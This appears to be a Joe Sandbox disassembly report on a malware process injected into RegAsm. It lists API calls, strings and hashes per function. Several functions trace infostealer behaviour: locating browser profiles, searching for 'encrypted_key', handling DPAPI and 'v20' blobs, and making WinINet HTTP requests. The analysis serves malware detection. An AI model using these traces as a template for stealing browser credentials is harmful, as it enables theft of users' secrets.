Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0133AAB8,?,0042110C,?,00000000), ref: 0041A82B
Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 39d9ca71da1bc9d1652a922a502435f613a84b1baf7be8d74ac8d700c30c56b7
Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
Opcode Fuzzy Hash: 39d9ca71da1bc9d1652a922a502435f613a84b1baf7be8d74ac8d700c30c56b7
Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95

Function 00414280 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041429E
memset.MSVCRT ref: 004142B5

Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B

lstrcatA.KERNEL32(?,00000000), ref: 004142EC
lstrcatA.KERNEL32(?,01342DF8), ref: 0041430B
lstrcatA.KERNEL32(?,?), ref: 0041431F
lstrcatA.KERNEL32(?,01342C18), ref: 00414333

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F

Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92

Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A

Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3

StrStrA.SHLWAPI(?,01342F18), ref: 004143F3
GlobalFree.KERNEL32(?), ref: 00414512

Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F

Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D

lstrcatA.KERNEL32(?,00000000), ref: 004144A3
StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
lstrcatA.KERNEL32(00000000,?), ref: 004144E5
lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 1191620704-0
Opcode ID: 5aa6d4880243c14683d09a921e5d6b983d8c65dcffd814794d78b03247387af5
Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
Opcode Fuzzy Hash: 5aa6d4880243c14683d09a921e5d6b983d8c65dcffd814794d78b03247387af5
Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95

Function 6C2A1E90 Relevance: 19.6, APIs: 9, Strings: 4, Instructions: 120COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C32E784), ref: 6C2A1EC1
LeaveCriticalSection.KERNEL32(6C32E784), ref: 6C2A1EE1
EnterCriticalSection.KERNEL32(6C32E744), ref: 6C2A1F38
LeaveCriticalSection.KERNEL32(6C32E744), ref: 6C2A1F5C
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C2A1F83
LeaveCriticalSection.KERNEL32(6C32E784), ref: 6C2A1FC0
EnterCriticalSection.KERNEL32(6C32E784), ref: 6C2A1FE2
LeaveCriticalSection.KERNEL32(6C32E784), ref: 6C2A1FF6
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C2A2019

Strings

\2l, xrefs: 6C2A1F3E
D2l, xrefs: 6C2A1F32
MOZ_CRASH(), xrefs: 6C2A2000
D2l, xrefs: 6C2A1F56

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
String ID: D2l$D2l$MOZ_CRASH()$\2l
API String ID: 2055633661-83092375
Opcode ID: 0e2a3b12ab6a7348a154e7d48bba49f6a81b28bc4abc1872cfecb1ea0f0189c4
Instruction ID: 144c630fe8b50802180d7f43cd041cb3051a16917b14c572a9c1bb04f0ac06fe
Opcode Fuzzy Hash: 0e2a3b12ab6a7348a154e7d48bba49f6a81b28bc4abc1872cfecb1ea0f0189c4
Instruction Fuzzy Hash: 7541E175B0031A8BDF008FBCD885BAA76B9EB4935AF000029FE45DB740DB7898058BD1

Function 6C2C5670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C2C56D1
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C2C56E9
?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C2C56F1
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C2C5744
??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C2C57BC
GetTickCount64.KERNEL32 ref: 6C2C58CB
EnterCriticalSection.KERNEL32(6C32F688), ref: 6C2C58F3
__aulldiv.LIBCMT ref: 6C2C5945
LeaveCriticalSection.KERNEL32(6C32F688), ref: 6C2C59B2
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C32F638,?,?,?,?), ref: 6C2C59E9

Strings

MOZ_APP_RESTART, xrefs: 6C2C56CC

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
String ID: MOZ_APP_RESTART
API String ID: 2752551254-2657566371
Opcode ID: 4b3765f6640b9db858012ed6de3ed9bf185cbff46e0b5bf10111a6c5b1649e95
Instruction ID: 1df9ccaf91e2d1e56d28a218fee0af905240864707f41df5c623fd6bd107aada
Opcode Fuzzy Hash: 4b3765f6640b9db858012ed6de3ed9bf185cbff46e0b5bf10111a6c5b1649e95
Instruction Fuzzy Hash: 6FC17A31A087949FDB05CF28C440A6ABBF5FF9A714F158B2DE8C497660D734E885DB82

Function 004152C0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 138stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,013439D8), ref: 00406303
Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,01343140,00000000,00000000,00400100,00000000), ref: 00406385
Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
lstrlenA.KERNEL32(00000000), ref: 0041532F

Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52

StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
lstrlenA.KERNEL32(00000000), ref: 00415383
strtok.MSVCRT(00000000,?), ref: 0041539E
lstrlenA.KERNEL32(00000000), ref: 004153AE

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Strings

ERROR, xrefs: 004153B9
ERROR, xrefs: 00415432
ERROR, xrefs: 0041546F
ERROR, xrefs: 004154A9
ERROR, xrefs: 0041530A

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3532888709-1526165396
Opcode ID: bec2e76437264b1511a80c6a3df9ed6309a82d0dc3a4b03c4e72d243c5143d1a
Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
Opcode Fuzzy Hash: bec2e76437264b1511a80c6a3df9ed6309a82d0dc3a4b03c4e72d243c5143d1a
Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A

Function 6C2EEC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C2B4A68), ref: 6C2E945E
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2E9470
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2E9482
Part of subcall function 6C2E9420: __Init_thread_footer.LIBCMT ref: 6C2E949F

GetCurrentThreadId.KERNEL32 ref: 6C2EEC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2EEC8C

Part of subcall function 6C2E94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C2E94EE
Part of subcall function 6C2E94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C2E9508

GetCurrentThreadId.KERNEL32 ref: 6C2EECA1
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C2EECC5
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C2EED19
CloseHandle.KERNEL32(?), ref: 6C2EED28
free.MOZGLUE(00000000), ref: 6C2EED2F
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C2EEC94

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: 01c8e559230459c7c0aabb6af903b63f05e6387c30efe19c9f21197ad0cfc96f
Instruction ID: 4025ffba4ea913d3abc400c2c751317ee8f7ad142d052f2e0816f7a222d831be
Opcode Fuzzy Hash: 01c8e559230459c7c0aabb6af903b63f05e6387c30efe19c9f21197ad0cfc96f
Instruction Fuzzy Hash: 5A21027560011CABDF009F24D808EAA373DEF4E36DF504218FC19AB740DBB99805CBA1

Function 6C305FF0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6C306009
??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C306024
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(Q*l,?), ref: 6C306046
OutputDebugStringA.KERNEL32(?,Q*l,?), ref: 6C306061
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C306069
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C306073
_dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C306082
_fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C32148E), ref: 6C306091
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,Q*l,00000000,?), ref: 6C3060BA
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C3060C4

Strings

Q*l, xrefs: 6C305FFC, 6C306042, 6C306045, 6C3060B3

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
String ID: Q*l
API String ID: 3835517998-2137847851
Opcode ID: a463d778d7350465394d3aeaafb9e6cb8b10878a7a2da185de8a2101df04efa8
Instruction ID: 847117dd27704920a928c207af36e797b802f105b2de517160ee82d4686b3508
Opcode Fuzzy Hash: a463d778d7350465394d3aeaafb9e6cb8b10878a7a2da185de8a2101df04efa8
Instruction Fuzzy Hash: 442195B1A00208AFDF205F24DC49A9A7BBCFF45718F04842CEC5A9B641DB79A559CFD2

Function 6C2B3A90 Relevance: 18.3, APIs: 12, Instructions: 295COMMON

Download Yara Rule

APIs

AcquireSRWLockShared.KERNEL32 ref: 6C2B3BB4
ReleaseSRWLockShared.KERNEL32 ref: 6C2B3BD2
AcquireSRWLockExclusive.KERNEL32 ref: 6C2B3BE5
ReleaseSRWLockExclusive.KERNEL32 ref: 6C2B3C91
ReleaseSRWLockShared.KERNEL32 ref: 6C2B3CBD
moz_xmalloc.MOZGLUE ref: 6C2B3CF1

Part of subcall function 6C2BCA10: malloc.MOZGLUE(?), ref: 6C2BCA26

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Lock$ReleaseShared$AcquireExclusive$mallocmoz_xmalloc
String ID:
API String ID: 1881024734-0
Opcode ID: 1c7f475a5779268d756f10416299b88aa6601f7541fe11ed07cbfc7b1b30cd14
Instruction ID: 4ab96a38cf07c463090167ee9664f9e67f83c9ba290ecededfb1084f1024a96e
Opcode Fuzzy Hash: 1c7f475a5779268d756f10416299b88aa6601f7541fe11ed07cbfc7b1b30cd14
Instruction Fuzzy Hash: 71C18DB59047058FC714CF28C084A5AFBF5FF89348F25865ED8999BB15DB31E885CB82

Function 6C2E8ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 6C2AEB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2AEB83

?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C2EB392,?,?,00000001), ref: 6C2E91F4

Part of subcall function 6C2DCBE8: GetCurrentProcess.KERNEL32(?,6C2A31A7), ref: 6C2DCBF1
Part of subcall function 6C2DCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C2A31A7), ref: 6C2DCBFA

Strings

timeline-ipc, xrefs: 6C2E9096
data, xrefs: 6C2E90E8
timeline-memory, xrefs: 6C2E9088
name, xrefs: 6C2E8F16
stack-chart, xrefs: 6C2E90B2
marker-chart, xrefs: 6C2E905E
marker-table, xrefs: 6C2E906C
timeline-overview, xrefs: 6C2E907A
timeline-fileio, xrefs: 6C2E90A4

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
API String ID: 3790164461-3347204862
Opcode ID: 5ef9119636a8762c2dbd3cc3ea3bf62d8a11f0cb03392e4d74191cad60af970e
Instruction ID: 093537bf6726c4e8631590b3d180ca888e2c3209de8d3ee3eda634b43ccc3102
Opcode Fuzzy Hash: 5ef9119636a8762c2dbd3cc3ea3bf62d8a11f0cb03392e4d74191cad60af970e
Instruction Fuzzy Hash: FEB1A0B4A0020E9BDF08DF98C895BEEBBB5BB89318F50441AD901BBF80D7359955CBD1

Function 6C2CC570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C2CC5A3
WideCharToMultiByte.KERNEL32 ref: 6C2CC9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C2CC9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C2CCA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C2CCA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2CCAA5

Strings

(null), xrefs: 6C2CC596
0, xrefs: 6C2CD30A

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 89e0bfba92fb3c9a2c18f7c783dd6762a34da8880df8fdc98bc48fa97427afb1
Instruction ID: da50c61c5193ccaf9d02909dab21470591996697db6d02c734646989d8ab170f
Opcode Fuzzy Hash: 89e0bfba92fb3c9a2c18f7c783dd6762a34da8880df8fdc98bc48fa97427afb1
Instruction Fuzzy Hash: 99A1CC307083469FDB50DF29CA44B5ABBE4AF89B49F048A2CFC9997641D735E805CB93

Function 6C2A48E0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 198COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,6C2E483A,?), ref: 6C2A4ACB
memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C2E483A,?), ref: 6C2A4AE0
moz_xmalloc.MOZGLUE(?,?,6C2E483A,?), ref: 6C2A4A82

Part of subcall function 6C2BCA10: mozalloc_abort.MOZGLUE(?), ref: 6C2BCAA2

memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C2E483A,?), ref: 6C2A4A97
moz_xmalloc.MOZGLUE(?,?,6C2E483A,?), ref: 6C2A4A35

Part of subcall function 6C2BCA10: malloc.MOZGLUE(?), ref: 6C2BCA26

memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C2E483A,?), ref: 6C2A4A4A
moz_xmalloc.MOZGLUE(?,?,6C2E483A,?), ref: 6C2A4AF4
moz_xmalloc.MOZGLUE(?,?,6C2E483A,?), ref: 6C2A4B10
